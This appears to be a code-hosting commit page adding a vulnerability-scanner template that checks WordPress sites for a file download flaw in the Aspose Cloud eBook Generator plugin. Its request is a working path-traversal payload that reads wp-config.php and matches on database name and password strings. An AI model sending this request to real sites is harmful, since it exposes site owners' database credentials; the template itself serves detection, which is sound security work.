Merge pull request #2903 from Akokonunes/patch-58
Create wp-aspose-cloud-ebook-plugin-file-download.yamlpatch-1
commit
7d41f63091
|
@ -0,0 +1,27 @@
|
|||
id: aspose-file-download
|
||||
|
||||
info:
|
||||
name: Aspose Cloud eBook Generator - File Download
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability.
|
||||
reference: https://wpscan.com/vulnerability/7866
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue